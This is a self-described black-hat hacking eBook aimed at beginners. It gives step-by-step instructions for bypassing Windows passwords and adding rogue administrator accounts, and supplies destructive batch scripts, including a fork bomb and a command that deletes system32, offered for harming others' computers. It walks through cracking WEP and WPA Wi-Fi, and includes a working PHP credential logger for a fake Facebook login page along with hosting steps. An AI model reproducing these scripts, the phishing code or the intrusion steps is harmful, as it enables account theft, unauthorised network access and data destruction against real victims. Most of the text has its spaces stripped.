Into The Hacker's Mind

...Keys To The Dark Side...

By CyberGod

Index : - Introduction -Chapter 1: Making it clear -I-The world "HACKER" -II-Different types of Hackers -a-Black hats -b-White hats -c-Grey hats -Chapter 2: The first steps -I-Beginners fun -a-Windows User passwords -b-Getting admin -c-Changing IP and VPNs -d-Batch virus -II-Wifi hacking -a-WEP -b-WPA/WPa2 -III-Online accounts hacking -a-Phishing -b-Keyloggers -c-RATs -Chapter 3: Because "Chapter 2" is too easy ! [These chapters will be included in Part 2 of the eBook] -I-Websites Attacks: -a-SQL injection -b-XSS/cross site scripting -c-DOS/DDOS -d-Defacing -II-Next level: Botnet -III-Worms ?? -IV-Booters -Chapter 4:Some coding and programming -I-Intro -II-Stealers -a-Builder -b-stub -III-Loggers -a-Builder -b-Stub -IV-Crypters -a-Builder -b-Stub -c-Runtime module -Chapter 5:Pentesting and backtrack -I-Introduction to penetration testing -II-Network scanning and information gathering -III-Social engineering toolkit and DNS spoofing -IV-Metasploit: -a-Intro -b-payloads/stager -c-meterpreter -Chapter 6:Extra : To keep your ass out of troubles -Chapter 7:From a hacker to another.

Helloandwelcometohackingworld,
thisebookwaswrittenbyCyberGodtohelpany neworintermediatehacker.Thisisn'tan informativebooknorahackingdictionary,but insteadyoucanconsideritlikeateacherthat willhelpyouthroughyourjourney,thismean thateverythingyoulearnfromthisbookcanbe appliedanduseddirectlyandnotjust informationaboutvarioussubjects. Nowthatyouknowwhatyouwillbereading,I wouldliketomentionthatIamnotresponsible foranyactionyoumakebasedonwhatyou learnedfromthisbook.AndIwouldliketo thankthewholeHFawesomecommunity,if youdownloadedthisbookfromsomewhere elseandyouarenotamemberofHFissuggest yougoandregisterforanaccountrightnow. http://www.hackforums.net

Chapitre1:Makingit clear.
I.Theworld'Hacker'
Youwanttobeahacker?ok...butfirstthingsfirst,so whatdoestheworld'hacker'referto? Usuallyahackerisapersonwithagreatknowledgein informaticand/orelectronics,andbygreatImeanmore thenanaverageperson.Nowwhenmostpeoplehearthe worldhackeritisassociatedwithevilandbadactionslike hackingbankaccountsorwebsites....Butyoumustknow thatnotallhackersusetheirknowledgeforbadthings.A hackeractivities:accountshacking,pentesting, programming,RATs/Botnet,makingmoney....Andabunch more.BeforeendingthissmallsectionIwouldliketosay thatanyonewhowantstobeanadvancedorexpert hackermustlearnhowtoprogramandcodeinseveral language,foratotalnewbieIsuggeststartingwith somethinglikeHTMLorVB.nettheseareeasytolearn.

II.Differenttypeofhackers
aBlackhats Blackhathackersarethebadguys,andyoumustknow thisisablackhatbook.blackhathackersusuallytryto hackintoalltypeofaccountsfromonlinebanksand paypaltofacebookandmsn,usingdifferentmethodslike RATs,keyloggersandfakepages.Amoreadvancedblack hathackerwillwanttowritehisowncryptersandRATs andtrytobuildahugebotnettotakedownserversand websites. Blackhathackersarealwaystryingtobreackanysecurity systemorbypassingAVandfirewalls,someofthemalso liketousesocialengineeringtotrickpeoplesintotheir traps. Thecauses?WellIcanonlythinkoftwomaincauses: makingmoneyorprouvingthemselfandaquiringforbiden knowledge.

bWhitehats Whitehatsaretheoppositeofblackhats,theseguysuse theirknowledgetohelpothers,theyusuallycodeAVand offerhelptoinfectedsystems;theytrytobuildwhatblack hatsdestroy. Thereisnotalottobetoldaboutthem,justknowthat theyaretheoppnentsofblackhatsinanendlesswar.

cGreyhats Asyoucanguessagreyhathackerisamixofablackanda whitehathacker.Usuallytheywantnoharmtoothersbut canturnintoablackhattoaccomplishtheirgoals.

Chaptre2:Thefirst Steps
I.Beginnersfun
aWindowsUserPasswords Inthischaptreyouwilllearnhowtoremoveanyuser passwordusingwindowsoperatingsystem.Iknowthis maysoundnoobortooeasyforsomebutforabeginner thiswillbeanexcellentfirstlesson. BeforegoingdirectlyintoactionIwouldliketoexplain howwearegoingtoremovethatpassword.BythewayI willbeshowingyou2methods.Firstoffallyoumustknow thatwindowsuserpasswordarestoredontheHDsousing asimplebootableprogramwecanhavefullaccesstothat HDandremovethepasswordthenbootagaininto windows,don'tworryifyoudidn'tunderstandaword becauseIwillexplaineverything.Thesecondmethodcan beusedonlywithawindowsXPoperatingsystem,what youactuallydoislogintothehiddenunprotecteduser

"administrator"andremovethepasswordoftheother usersfromthere.

.1.
Enoughtalkingletsgettoaction,Iwillexplainthesecond methodfirst.Assumingyourontheloginscreenandyour askedforthepassword,allyouhavetodoispress ctrl+alt+delthenkeepingthectrlandaltpressed,release thedelbuttonthenpressitagain.Youshouldbe presentedwithaloginformwhereyoucanenterauser andapassword,intheuserwrite"administrator"without andleavethepasswordfieldblanknowyoushouldbeable tologintotheadministratoruser.Oncethereyoucan removeanyotheruser'spasswordwithoutknowingthe oldone,finallyyoushouldknowthattheuser administratorcanbeprotectedbyapasswordsothis methodwontworkanymore,butindefaultitcomeswith nopasswordandmostpeopledon'tknowaboutthatuser soin99%ofthetimeitwillbeunprotected.

.2.

Nowfortheothermethod.YouwillneedablankCDor DVD,acd/dvdandaburningsoftware;Iamgoingtobe usingNerobutyoucanuseanyotherburningsoftware. NowifyouareinNerochoose"burnimage"andselectthe "passwordreset.iso"providedinthe"Files"folder.Inserta blankCDandclickburn,youshouldendupwitha bootableCD.Iwanttomentionthatwecanalsouseausb insteadofaCD,justfollowtheinstructionbrovidedbythe "README.txt"insidetheisoimage. ThenextstepwouldbetobootfromtheCD/DVD/USB,for thatyouhavetoinsertyouCD/DVD/USBthenrestartyour computer,andfollowoneoftheinstructionsbelow: Whenthecomputerisstartingyouwillgetamessage similartothat"pressF1toenterBIOSsetup"F1isn'tthe standarkeyforallBIOSitvaryfromonetoanother.To enterthesetupsimplypressthecorrectkey.Nowinthe BIOSgotothetab"Startup"or"Boot"andchangethe bootorder,ifyourbootingfromaCDorDVDputthe CD/DVDdriveatposition1,ifyouwanttobootfromaUSB stickthenchoosethecorrespondantdeviceandputitat position1.

IntheabovepictureIchosetheDVDdevicetobe#1.Next youneedtosaveandexit.Afterthesetupexityour computershouldrebootanditwillbootfromtheCD, pressenterandwaitfortheprogramtoload. Thefirstthingyouwillbeaskedistochoosethecorrect partition,thismeanifyourHDDisdevidedintoseveral partion(ex:C:\andD:\)youneedtochoosethesystem partition(theonecontainingthe"windows"folderand files),inmycaseitisnumber"2",soIwilljusttype"2"and hitenter.

Nextwewanttopointtheprogramtotheconfigfolder, don'tpanicitisusually"Windows/system32/config"you getthisoptionbydefaultsojustpressenterwithout typinganything.

Nowchoose"Passwordreset"whichisnumber"1".

Then"Edituserdataandpasswords"

Nowyouneedtochoosetheuserwiththepasswordtobe removed,forthatyouneedtotypetheholenameofthe useranditiscasesensitive(Youwillbeprovidedwiththe userslist).

Thenyouwillbeprovidedwithseveralusefuloptions,we aregoingtouseoption"1"orifyouwanttochangethe passwordandnotremoveitthenchoose"2"andhitenter.

Youwillgettheabovemessage"Passwordcleared!"now type"!"thenpressenter.Youwillbeasked:"Aboutto writefile(s)back!Doit?"bydefaultitis[n]whichmeans "no",thiswillundothechangessowewanttotype"y"for yesandpressenter,pressenterforthenextmessageand youaredone.RemovetheCDandpressctrl+alt+delto reboot.

Aftertherebootyouwillnoticethatthepasswordwas removed.Don'tforgettochooseyourHDDastheboot devicefromtheBIOSafteryouaredone.Thisistheendof ourfirstlesson.

Gettingadmin ThatisactuallyprettysimpleonaWindowsmachine,you willlearn2differentwaystodoit.Andifyouareasking whyIamalwaystargetingWindowsmachines,thenthe answerwouldbebecauseWindowsisthemostused operationsystemandtheeasiesttohack.Nowtoaction. Methode1:YouaregoingtouseCMDoralsoknowas commandprompt.Formethismethodeisuselessbecause youneedtobeadministratorinthefirstplace,allitdoesis addanotheradministratoruser,butitcancomeinhand somedayiftheaccountyourinismonitoredorhavesome restriction,Idon'tknow...Hereiswhatyouneedtodo opencmdbygoindto"Run"thentypeCMD.exeoropena notepadandtypein: "cmd" Withoutquotesandthensaveitasanything.BATitis importanttoadd.batattheendofthenamesoitis treatedasabatchfile. OnceiinCMDtype: netlocalgroupAdministrators<username>/add replace<username>withthenameyouwantandpress

enter.Nowlogoutandyoushouldseethenew administratoruser. Method2:Forthismethodyouneedtodotheexactsame thingwedidwiththe"Passwordreset"(seeithere)until youareatthisstage

Nowyouneedtochooseoption3"Promoteuser"and continuethesamewaywedid for removing the password. TheEnd

cChangingIPaddressandVPNs WhywhouldIwanttochangemyIP?andwhatisaVPN? wellIwillansweryourquestionrightnow.Ifyouaregoing tohackawebsiteorRATsomeoneyouobviouslydon't wanttobetrackedsochangingyourIPisgoingtohelpyou alot.ChangingyourIPcanalsohelpbypassingsome restrictionslikeabannedIP. NowfortheVPNpart;VPNstandforVirtualPrivate Network,usingaVPNservicewillcreateaprivate encryptedconnectionbetweenyouandtheproviderthis meanthatnoonecaninterceptyourconnectionandif someonetracedyoubackitwillleadhimtotheVPN providerandnottoyourpersonalcomputer. IwilltalknolongeraboutVPN,becauseitiseasytoget one,thereissomefreeVPNouttherebutthebestones chargesformoney. NowhowtochangeyourIP;youaregoingtoneedaproxy changerprogramandaproxylist.Aproxyissimplyan IP+portyouusethatporttoconnecttotheIPanduseit.I willbeusingaprogramcalled"Proxyswitcher",itisapaid programbutIprovidedyouwithacrackedcopy,youcan findinin"Files"underthename"ProxySwitcher.rar".

Nowfollowtheinstructions: 1InstallingProxySwitcher: FirstextracttherararchiveandinstallProxyswitcher, aftertheinstallationisdonerightclickonProxyswitcher iconintaskbarandclick"registerproxyswitcher"useany namewiththekeyIprovidedinkey.txt.Nowexitproxy switcherthenlunchitagainandyouareoktogo. 2findingfreshproxy:Wellthispartismorelikeagoogle searchyouneedtosearchfor"proxylist"or"freshproxy list"oryoucanusetheProxyswitcheritselftoseachfor proxysforyouhereishowyoudothat. .a.UsingProxySwitcher: Richtclickonthetaskbar>ShowManager

Nowclickthe"Commontaskwizard"

Click"Next"thenchoosethefirstoptioninthecommon tasksandclickfinish.

Thenwaitfortheprogramtogettheproxythenscanthen andyouwillhavealistofdeadandworkingproxysnow doubleclickonanyworkingoneandyouaregoodtogo. Note:Sometimeyourinternetconnectionmaygetslower basedonthespeedoftheproxyserver.Andyouwont alwaysfindproxyusingProxyserversoIprefersearching ingoogle. .b.UsingGoogle(Better): Simplegotogoogleansearchforfrechproxylist,getany listthatyouthinkisfreshthencopyittoanotepadand saveit.NowgotoProxyswitcher>File>Importfrom textfile...andchoosethetxtfileyousavethelistin.

Nowclickonnewandyoushouldhavealistonunchecked proxys.

ClickonTestproxyserversforavailibility.Andwaitforthe scan.

NowYoushouldgetworkinganddeadproxys.Chooseone oftheworkingproxyandconnecttoitthengoseeifyouip haschanged.Hereisatrick,ifyougetnoworkingproxy youcanchooseadeadonewitharelativelysmall ping/Responseandconnecttoitanditshouldwork.Here isapicturetomakethingsclear.

BeforeIconclude,hereisalistoffreeVPNservices: ProXPN CyberGost

HotspotShield GPass SecurityKiss andabunchmore...

dBatchVirus "Batchfileisthenamegiventoatypeofscriptfile,atext filecontainingaseriesofcommandstobeexecutedbythe commandinterpreter.

Thecommandsmaybebuiltintothecommandprocessor (COPY),suppliedwiththeoperatingsystembutnotbuilt intoit(XCOPYinvokestheMicrosoftDOSprogram XCOPY.EXE),ormaybeanyprogram(cpinvokesthe programcp.exeifpresent,an.EXEportoftheUnixcp command,withessentiallythesamefunctionalityas XCOPY.EXE).

Similartojobcontrollanguageandothersystemson mainframeandminicomputersystems,batchfileswere addedtoeasetheworkrequiredforcertainregulartasks byallowingtheusertosetupascripttoautomatethem. Whenabatchfileisrun,theshellprogram(usually COMMAND.COMorcmd.exe)readsthefileandexecutes itscommands,normallylinebyline.[1]Unixlikeoperating systems(suchasLinux)haveasimilartypeoffilecalleda

shellscript.[2]

Thefilenameextension.batwasusedinDOS,andthe Windows9xfamilyofoperatingsystems.TheMicrosoft WindowsNTfamilyofoperatingsystemsandOS/2added .cmd.Batchfilesforotherenvironmentsmayhave differentextensions,e.g..btmin4DOSand4NTrelated shells."ThanksWikipedia.

Nowthatyouknowwhatabatchfileis,Iwillgivealistof somecommandsandadecriptionthenjumptothepart whereweusethesecommandtomakesimpleevilvirus. (Don'tbeafraidofthelistyoudon'thavetomemoriseit :P,wewillbeusingonlyafewofthesecommands.)

Commandslist: @ InDOSversion3.3andlater,hidestheechoofa batchcommand.Anyoutputgeneratedbythecommandis echoed.TheatsigncanbeprefixedtoanyDOScommand, programname,orbatchfilenamewithinabatchfile.

@[command] examples @ {Seperatessectionsofthebatchfile withoutdiplayingtheDOSprompt.}

@echoOFF

{Hidestheechooffreport.}

%DIGIT Replaceablebatchparameterswhicharedefined bytheuserwhenthebatchisexecuted.Theparameters areseparatedbyspaces,commas,orsemicolons.

%digit {Digit:anydigitfrom0to9.%0hasthe valueofthebatchcommandasitappearsonthe commandlinewhenthebatchisexecuted.%1represents thefirststringtypedafterthebatchcommmand.Each occurrenceof%digitisreplacedbythecorresponding stringfromthebatchcommandline.} examples MYBATCHDOCA: {Copiesall.DOCfilesinthedefault

COPY*.%1%2

directorytodriveA:}

%VARIABLE% ReplacestheDOSenvironmentvariable namewithitsenvironmentvalue.

%variable% {Variable:astringofuppercase characersintheenvironmentassociatedwithastring value.Variableiscreatedintheenvironmentbyusing SET.} examples %PATH% {ReturnsthevalueofPATH,the currentsearchpath,whichisexecutable.}

echo%PATH% currentsearchpath.}

{DisplaysthevalueofPATH,the

%PROMPT% {ReturnsthevalueofPROMPT,the currentpromptstring,whichisexecutable.}

echo%PROMPT% {DisplaysthevalueofPROMPT,

thecurrentpromptstring.}

echoThecurrentsearchpathis:%PATH% {Displays themessageincludingthecurrentsearchpath.}

setUSER=John if%USER%==JohngotoLABEL {SincethevalueofUSER doesequal"John",thecontrolistransferredtothelabel, LABEL.}

CALL Loadsandexecutesabatchfilefromwithina batchfileasifitwereaexternalcommand.Whena secondbatchfilecompletes,controlisreturnedtothe callingfile.

call[drive:][path]filename[batchparameters] BeforeDOSversion3.3: command/c[drive:][path]filename[batchparameters]

CLS Clearsthevideodisplayscreen,settingthecursorin theupperlefthandcorner.

cls

ECHO Controlswhethercommandsandcomments withinabatchfilearedisplayed.

echo[ON|OFF|message|.] examples echo {Displaysechostatus}

echoON {Restoresnormaldisplayactivity.}

echoOFF commands.}

{HaltsdisplayofDOSpromptand

echoProcessing... {Displays"Processing..."onthe screen.}

echo%USER%{DisplaysthevalueofUSERonthe screen.}

echo.

{Displaysasingleblanklineonthescreen.}

echo^L>prn {SendsanASCIIcontrolcode(form feed)totheprinter.Press<Ctrl>plus<L>totypethe^L character.}

echoY|Del*.* {AnswerstheDEL"Areyousure" questionautomatically.}

FOR RepeatstheoperationofaDOScommandforeach memberofalist.UseCALLtoexecuteabatchfileasa command.

for%%argumentin(list)docommand {Argument: anyletterfromAtoZ.List:asequenceofstringsseparated

byspacesorcommas.Wildcardsareallowed.} examples for%%din(A,C,D)doDIR%%d*.* {DisplaysthedirectoriesofdrivesA,C,andD sequentially.}

for%%fin(*.TXT*.BAT*.DOC)doTYPE%%f {Typesthecontentsofall.TXT,.BAT,and.DOCfilesin thecurrentdefaultdirectory.}

for%%Pin(%PATH%)doifexist%%P\*.BATCOPY%% P\*.BATC:\BAT {Copiesallbatchfileswhichexistin anydirectoryontheDOScommandsearchpathintothe directoryC:\BAT.}

for%%fin(*.PAS)docallcompile%%f {Compilesall .PASfilesinthecurrentdefaultdirectory.}

GOTO Transferscontrolwithinabatchfiletoaline identifiedbyalabel.Thelabelmustbeoftheform ":LABEL".

gotoLABEL :LABEL

IF Testsaconditionandexecutesacommandonlyifthe conditionisTRUE.ButiftheNOTmodifierispresent,the commandwillbeexecutedonlyiftheconditionisFALSE.

if[not]conditioncommand {Condition:errorlevel number;string1==string2;orexistfilename.Command: anyDOScommand,batchcommand,batchfilename,or programname.} examples if[not]errorlevelnumbercommand {Errorlevel:anexitcodereturnedbyaprogramoran externalcommand.ThefollowingDOScommandsreturn anexitcode:BACKUP,RESTORE,FORMAT,REPLACE,and XCOPY.Number:anumericalvalue(integer)againstwhich theexitcodeiscompared.TheconditionisTRUEiftheexit codereturnedbythepreviousprogramisgreaterthanor equaltonumber.TheconditionisFALSEiftheexitcodeis

lessthannumber.}

BACKUPC:\*.*A:/s iferrorlevel3gotoTROUBLE {IftheBACKUPcommand exitswithacodeof3orhigher,controlwillbetransferred tothelabelTROUBLE.}

iferrorlevel3ifnoterrorlevel4echoERROR#3 occurred iferrorlevel4ifnoterrorlevel5echoERROR#4occurred {Nestedifstatementsthatdeterminetheexacterror number.}

if[not]string1==string2command {Thecondition isTRUEifbothstringsareidentical.Thecomparisoniscase sensitive.Ifeitherstringisblank,asyntaxerroroccurs.}

if(%1)==(LTRS)CDC:\WORD\LTRS

{Ifthefirst

parameterisLTRS,thechangedirectorytoLTRS.}

if"%1"==""gotoERROR {Ifthereisno parameter,thencontrolistransferredtolabelERROR.}

ifnot%2X==XDIR%2\*.* {Ifthereisasecond parameter,thendisplayallthefilescontainedinthe directory%2.}

ifnot"%3"==""ifnot"%3"=="b"ifnot"%3"=="B" gotoBADPARAM {Ifthereisnothirdparameterorifitis anythingotherthanborB,thengotolabelBADPARAM.}

if[not]existfilenamecommand {Theconditionis TRUEiffilenamecanbelocated.Thefilenamecaninclude driveandpathspecifications.Wildcardsareallowed.}

ifexistD:\%1\nulCD%1

{Testsfortheexistence

ofdirectory%1evenifitcontainsnofiles,thenchangesto thatdirectoryifitexists.}

ifnotexistA:\FLASH.EXECOPYC:\PROJECTS \FLASH.EXEA:{CopiesFLASH.EXEtodriveA,butonlyifit doesn'texittherealready.}

PAUSE Pausestherunningofabatchfileanddisplays themessage"Pressanykeytocontinue..."onthescreen. Iftheoptionalmessageisincluded,itwillbedisplayed first.Usepausetooptionallyterminatethebatchfilewith <CtrlBreak>atasafeplace.Theoptionalmessageisnot displayedwhenechoisOFF,sothemessagemustbe echoedontheprecedingline.

pause[message] examples pause continue...".} {Displays"Pressanykeyto

pause<nul

{Waitswithnocomment.}

pauseDoyouwanttocontinue? {Displays"Doyou wanttocontinue?"with"Pressanykeytocontinue..."on thenextline.}

REM

Addsremarkstoabatchfile.

rem[remark] examples @rem {Hidestheremarkfromdisplay.}

SET SetwillviewtheDOSenvironmentorcreate,change, ordeleteenvironmentvalues.

set[variable=[value]] {Variable:astringof characters,unbrokenbyspaces,whichareconvertedto uppercaselettersintheenvironment.Value:astringof characters,casespecific,associatedwithvariable.} examples set {DisplaytheentireDOSenvironment.}

setUSER=John string,"John".}

{SetsthevalueofUSERtothe

setUSER= environment.}

{RemovesUSERfromthe

setPATH=C:\;C:\DOS currentsearchpath.}

{SetsC:\;C:\DOSasthe

setPATH=%PATH%;C:\TEST {Appends;C:\TESTto thecurrentsearchpath.}

SHIFT Shiftsanyparameteronthecommandlineone positiontotheleft.UseSHIFTtorefertomultiple parametersbyonenameortousemorethanten parametersonasinglecommandline.

shift examples :LOOP

COPY%1A: shift ifnot(%1)==()gotoLOOP {Beginningwiththefirst parameter,alltheparameterslistedonthecommandline areiteratedandafile,thevalueoftheparameter,is copiedtoA:.}

Miscellaneous

command>nul oblivion.}

{Redirectscommandoutputto

command>file file.}

{Redirectscommandoutputto

command>>file {Appendscommandoutputto file.}

command<file

{Redirectsfileoutputto

command.}

PATH {Displays"PATH="followedbythevalueof PATH,thecurrentsearchpath.}

PATHdirectories {Setsdirectoriesasthecurrent searchpath.}

PATH=directories {Setsdirectoriesasthecurrent searchpath.}

PATH; {Disablesextendedcommandsearchingand confinesthesearchingtothedefaultdirectory.}

PROMPT {Resetsthepromptstringtoitsdefault,$n $g.}

CD {Displaysthecurrentdirectoryanditspath.}

. {Representsthedefaultdirectory(IfPATH=D:\;C: \SYS;C:.thencurrentdirectorywillbesearchedafterD: andC:\SYS).}

.. {Representstheparentofthedefaultdirectory (C:\TOOLS\WP\LTRS.DOCisthesameas..\WP \LTRS.DOC).}

%% {Aliteral"%".}

Endoflist

Nowtothecoolpart,Iwillshowyouseveralbatchfiles thatcanbeusedtoharmsomeonespcorjusttoprank someone.Forallthefollowingexemplesyouneedtotype thecodeinanotepadandsaveitas"something.BAT"

adding".BAT"attheendisamustdosoitsavethefileas batch. 1openendlesswindows: @echooff startfile.bat gotofile.bat #Howthecodeworks:"file.bat"isthenameofyourbatch fileyoucanchngeitifyouwant. "startfile.bat":openthefile.bat "gotofile.bat":gotothepreviouslineandopenanother windows.Sothisisanendlessloopofopeningwindows andthebestpartisthateverynewwindowswillstart openingnewwindowsalso.Thiscancrashanoldweak computer. 2Deletefileorfolder @echooff del/q"c:\windows\system32" Thesetwolinesmayappearprettysimplebutcanhavea devastatingeffectonaWindowsoperatingsystem.We

aresimplyusingthe"del"commandtodeleteaspecific foldercontants,inthiscase"system32"folder.Thetricky partisthe"/q"after"del",addingthiswillseletethefiles withoutaskingtheuserforcomfirmation. 3Shutdowncomputer Usage:shutdown[i|l|s|r|a][f][m \\computername][txx][c"comment"][dup:xx:yy] Noargs Displaythismessage(sameas?) i l s r a DisplayGUIinterface,mustbethefirstoption Logoff(cannotbeusedwithmoption) Shutdownthecomputer Shutdownandrestartthecomputer Abortasystemshutdown

m\\computername Remotecomputerto shutdown/restart/abort txx Settimeoutforshutdowntoxxseconds c"comment" Shutdowncomment(maximumof127 characters) f Forcesrunningapplicationstoclosewithoutwarning

d[u][p]:xx:yy Thereasoncodefortheshutdown uistheusercode pisaplannedshutdowncode xxisthemajorreasoncode(positiveintegerlessthan256) yyistheminorreasoncode(positiveintegerlessthan 65536) Veryclearnoneedtoexplainanything.

Conclusion:Usingthecmdcommandyoucanprettymuch doanytaskinwindows,theaboveexemplesjustshowyou howtoplaywithbuiltincommandstoachiveyourown goals...

II.WifiHacking
InthissectionIwillshowyouhowtocracktwodiffrent typeofwifiencryptions,WEPandWPA/WPA2.Inboth sectionswewillbeusingbacktrack5R2soifyoudon't haveitgodownloaditnowitisfreefromtheofficialsite,I useKDE32bitbutanyotherversionofBT5willdoit.For whodon'tknowwhatisBacktrack:"BackTrackisaLinux basedpenetrationtestingarsenalthataidssecurity professionalsintheabilitytoperformassessmentsina purelynativeenvironmentdedicatedtohacking." Hereistheofficialwebsite:http://www.backtrack linux.org/ DownloadbacktrackthenburnittoaDVDandboot.Once yourintype"Startx"tochangefromtextlogintographical login. Backscreenfix: 1)inserttheDVDlive 2)inthegrub(Whenaskedtochooseabootoption)press TABtoeditboot 3)youwellseesomthinglikethis

file=/cdrom/preseed/ubuntu.seedboot=casper initrd=/casper/initrd.gz addxforcevesanoapicnoapcinosplashirqpoll after initrd.gz Thisshouldfixtheproblem. Wep Wepisrelativelyeasytocrack,specialywithBT5and "Gerixwifihacker".Onemorething,ifyouwantto experimentallaricrackfeaturesyouwillneedtohavea compatiblewirelesscard,IsuggestAlfaNetworkwireless adapters. FirstweneedtoopenGeriswificracker."Backtrack> ExploitationTools>WirelessExploitationTools>WLAN Exploitation>gerixwificrackerng"

NextGotothe"Configuration"tabselectyourwireless cardinterfaceusually"wlan0"or"wlan1"andclick "Enable/DisableMonitorMode".

Anewinterfaceshouldappearunderthename"mon0" having"Monitor"asMode.Ifthatdoesn'thappenorifthe Modeisn't"Monitor"thenprobablyyourwirelesscard isn'tcompatible.Anywayletsmoveon,nowselectthe newmonitoredinterfaceandclick"Rescannetworks".You willgetalistoffallwirelessnetworksnearyou,Essidisthe nameofthenetworkandBssidisthemacaddress,youwill needalsetocheckthe"Enc"(encryption)tab,forthispart thenetworkshouldhavea"WEP"encryption.Selecta compatiblenetworkandmovetothe"WEP"tab.

Firstweneedtocollectsomepackets;gotothe"General functionalities"sectionandclick"StratSniffingand Logging".

Anewterminalwillappear,showingthepacketscapture andalltheclientconnectedtotheattackedaccesspoint (Router).Thenumberunder"#Data"determinehowmany packetswehavecaptured.andthemacaddressunder "Station"refertotheclientsconnectedtotheAP,inmy casethereisonlyonedeviceconnectedwiththemac address"7C:11:BE:91:FF:E6"(Icantellitisaniphonefrom themacaddress).

ThemoredeviceusingtheAPthefasterwewillcollect packets,ourgoalnumberisabove10000packets.Now fortheattacks,inmycaseIamusinganintelwirelesscard sotheattackswonthaveabigeffectbutIwillshowyou howtodothem.Iwillgowith"WEPAttacks(noclient)" becausethiswillworkevenifthereisnodeviceconnected tothewirelessnetwork. Wehavetwotypeofattacksinthenoclientsection: ChopChopandfragmentation,hereisalistofprosand

cons: Fragmentation Pros Canobtainthefullpacketlengthof1500bitsxor.This meansyoucansubsequentlyprettywellcreateanysizeof packet. Mayworkwherechopchopdoesnot. Isextremelyfast.Ityieldsthexorstreamextremely quicklywhensuccessful.

Cons NeedmoreinformationtolaunchitIEIPaddressinfo. Quiteoftenthiscanbeguessed.Betterstill,aireplayng assumessourceanddestinationIPsof255.255.255.255if nothingisspecified.Thiswillworksuccessfullyonmost APs.Sothisisalimitedcon. Setuptoexecutetheattackismoresubjecttothedevice drivers.Forexample,Atherosdoesnotcgeneratethe correctpacketsunlessthewirelesscardissettothemac addressyouarespoofing.

Chopchop Pros Mayworkwherefragdoesnotwork. Youdon'tneedtoknowanyIPinformation.

Cons Cannotbeusedagainsteveryaccesspoint. Themaximumxorbitsislimitedtothelengthofthe packetyouchopchopagainst. Muchslowerthenthefragmentationattack. Iwillstartwiththechopchopattackfirstclick"Startfalse accesspointAuthenticationonvictim".

Then"StartChopChopattack"type"y"foryesinthenew windowsandpressenter.Waitsomesecondsthenpress "CreatetheARPpackettobeinjectedonthevictimaccess point".

Finally"Injectthecreatedpacketonvictimaccesspoint". Followthesamestepsforthefragmentationattackthey areverysimilar. Nowwewaituntilwegetmorethen1000015000 packets.

Thengotothe"Cracking">"WEPcracking"andclick "AircrackngDecryptWEPpassowrd",waitforittofinish andyouwillgetyourpassword.Removethe":"from,so inmycaseitwillbe"2400242890".

WPA/WPA2 Thisattackneedatleastoneclientwhoisconnectedto theAP. SameasWEPuntilyouchooseanetworktocrack,forthis youneedthenetworktohaveWPAorWPA2encryption. selectitthengoto"WPA"tab.

Now"StartSniffingandLogging".

 Nowweneedtogeta"Handshake"sowecanbruteforce thepassword,todothatopen"WPAattacks"thenclick "autoloadvictimclients"

Nowclick"clientdeauthentication"waitforittofinishand youwillget"WPAhandshake:APBSSID"(ifnottry increasingthedeauthnumber,itis4bydefault).

>Waiting forclientdeauthentication.

Afterwegetahandshakewearereadytostartcracking, sofirstweneedtogetadictionaryfile;itisbasiclyavery biglistofpasswordyoucanfindoneeaslyifyougoogleit. Iwillassumeyougotyoudictionaryfile,nowgoto "Cracking">"WPAbruteforcecracking".Innormal crackingtypethelocationofyourdictionaryfile(including

thefile'sname)andclick"AircrackngCrackWPA password".

Almostdone,ifyourdictionarycontainsthepassword aircrackshouldbeabletodecryptit.

Thisconcludethesecondsectionofchapter2.

II.Onlineaccounts. (Facebook,hotmail,gmail...)
Ifyouhavenoideaoranypreviousexperienceabout accountshackingthenREADthis: 1Aprogramorasoftwarethatautomaticallyhack accountsbygivingitusernameoremaildoes

NOT

exist,sopleasedon'tbefooledbythefakeyoutube videos. 2SocialEngineering:alsoknownasSEistheartof manipulating/trickingpeoples;usuallyusedtogetsome informationfromthevictimortrickthemintofakelogin/ keyloggers.... 3HackingaccountsISacybercrimeandcangetyouinjail insomecountrys. 4"Ohhnomyfacebook/hotmail....accountwashacked, howcanIhackitback?"Stopwhiningaboutandusethe passwordrecoverybutton,itisloteasierthenhackingthe personwhohackedyouinthefirstplace.

5Thesetutorialsareforeducationpurposesodon't abusethisknowledgeforpersonalrevenge. Enoughsaidletsmoveintoaction. aPhishing Aphishingpageisafakeloginpagethatlooksexactlylike theoriginalonebutonceyouloginitwillsendthe usernameandpasswordtothehacker.Itisprobablythe easiestandmostefficientwaytohackanaccount,but requiremoreSEthentheother. 1Whatyouwillneed: Free/paidwebhosting. ....Yes,thatisallyouwillneedinadditiontoabrainanda computerofcourse. 2Makingthefakepage: aChooseawebsite,IwillgowithFacebook,ifyoudon't haveanyknowledgeofhtmlandphpcodingsticktomy exemplesoyoufollowmeeasily. bGotothewebsiteloginpage,inmycaseitis facebook.comorfacebook.com/login.phpbothpageshave aloginform.Thenweneedtogetthewebpagesource

code,ifyouareusingfirefoxjusrrightclickandselect "ViewPageSource"oryoucanpressCtrl+U.Copyall codethenpastitinnotepad++ornotepad. cNowweneedtocreateaphpfilethatwillreceivethe message(email/pass)sentbythepageandwriteittoa textfile.Sogoonandopenanewnotepadwindowsand copypastthiscode. <?php header('Location:http://'); $handle=fopen("logs.txt","a"); foreach($_POSTas$variable=>$value){ fwrite($handle,$variable); fwrite($handle,"="); fwrite($handle,$value); fwrite($handle,"\r\n"); } fwrite($handle,"===============\r\n"); fclose($handle);

exit; ?> Youcanedit: Theredirectionlocationinthesecondlineafter "Location:" Textfilenameholdingtheemailsandpasswordsinline3 originalname"logs.txt" Afteryouhavesettheseoptiontoyourlikingsaveitas something.php(Iwillnameitaction.php) dUploading:Firstyouneedtocreatanaccountwith webhostingservicehereissomefreeones: 7ry.us 000webhost.com freewebhostingarea.com zymic.com Afteryouhavecreatedandaccountcreateafreedomain thenlogintoyourdomain.

Nowinyoudomaincpanelsearchforyourftplogininfo, andsavethensomewherethenlogout.

GoogleFilezillaanddownloaditthenusetheftploginyou gotfromyourhosttologin.

Nowyoucaneasilyuploadfilefromyoucomputer(left)to theonlinehost(right);goonanduploadthephpfilewe createdearlier.

Thefileaction.phpisnowonlinesoletsgethislink,todo thatrightclickthefileandselect"CopyURL(s)to clipboard".

